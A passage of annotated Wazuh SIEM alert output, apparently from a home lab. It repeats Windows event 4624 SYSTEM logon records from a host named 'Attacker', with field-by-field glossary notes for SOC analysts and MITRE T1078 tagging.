data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.079+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  35
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.370337
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:38.0009000Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43707
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.147+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.147+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.377673
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:38.9779159Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43712
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14916
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.312+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.312+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  37
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.385011
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:51:47.2593671Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43718
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.362+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.362+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  38
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.392345
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
